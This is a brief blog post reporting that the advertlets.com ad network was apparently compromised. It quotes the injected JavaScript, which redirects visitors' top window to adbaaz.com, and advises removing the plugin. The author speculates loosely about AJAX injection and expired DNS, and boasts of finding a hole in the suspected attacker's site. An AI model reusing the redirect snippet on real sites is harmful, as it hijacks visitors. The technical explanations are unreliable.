|
Jan 05
|
Today at 5.00p.m (GMT +8) i’m the first to notice adverlets being hacked by adbaaz.com (see whois). It’s not hard for me where have they hack advertlets.com. They have replace “http://apps.advertlets.com/adl-js/savvy/savvy.lite.animator.js” file into
if( cHeight <= 200 )
{
window.top.location = “http://www.adbaaz.com/?dn=apps.advertlets.com&flrdr=yes&nxte=js&prvtof=8b2VkUqfXDCVzkFKsQ1rPbXbLzl10g%3D%3D”;
}
How did they inject? have you heard AJAX injection?
SOLUTION
Remove temporarily your advertlets plugin until Advertlets make changes to their coding!
UPDATE AT 19:16: It’s not hard to determine who behind this adbaaz.com. I manage to get his other main website http://www.clckm.com/ and guess what! He is lousy programmer. I manage to find hole in his website!
So I wonder, who the real hacker!!
MORE UPDATE AT 19:46 – After digging why everything is happen, I found something embarrassed about Advertlets.com DNS..
Can’t see much? View on top pages.
When DNS expired, it’s open port. Is that true? So People with high knowledge will utilize this weakness. Suddenly I realize.
WTF!! Advertlets don’t have enough money or they don’t implement project management carefully. WHAT A FLAW!!